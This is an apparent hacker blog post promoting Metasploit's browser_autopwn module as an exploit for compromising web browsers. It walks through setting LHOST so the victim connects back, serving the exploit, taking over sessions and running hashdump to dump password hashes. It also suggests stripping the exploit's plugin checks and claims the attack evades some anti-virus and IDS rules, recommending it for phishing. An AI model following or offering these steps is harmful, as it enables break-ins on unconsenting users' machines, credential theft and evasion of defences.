At the Defcon conference this year a new exploit was provided to the open source hacking community (thanks to Egypt, thank you), which allows one to fingerprint the victim's browser/OS and patch levels prior to sending the exploit. Previously the exploit was characterized as a cluster bomb, but it is now known more as a guided missile. I was able to test this exploit against a vulnerable microshaft IE 6.0.3 browser this afternoon and the payload exploited without a hitch! If you like watching videos, here is a good proof of concept on YouTube that you can develop your future exploits from:
(PaulDotCom Enterprises, LLC)
http://www.youtube.com/watch?v=FwBDTg7W1wY
Just run the Metasploit console and load the auxiliary/server/browser_autopwn module, then set values for:
LHOST (IP address the victim will connect back to)
SRVPORT (port to run the exploit server on; can be 80, or 443 for HTTPS)
URIPATH (directory path to host the exploit from)
Run the exploit, then connect from the victim's vulnerable browser to http://
Test:
sessions -l (session IDs should be listed)
sessions -i (session id), then type: hashdump, ipconfig /all, ifconfig -a (whatever)
If not, then try again. I had some problems when the browser sent a response the server didn't know how to respond to (it sent a RST and a 404 message back to the client, usually when the victim's browser doesn't have a plugin installed, like Apple QuickTime, Java or something like that). Take out those checks done by the exploit in the Ruby code and you might have some success!!! I didn't test with an anti-virus scanner installed, but I have heard it can bypass/evade some of the scanners and generic IDS rules based on how you submit your exploit to the victim. This is definitely an effective means of getting inside through a phishing attack.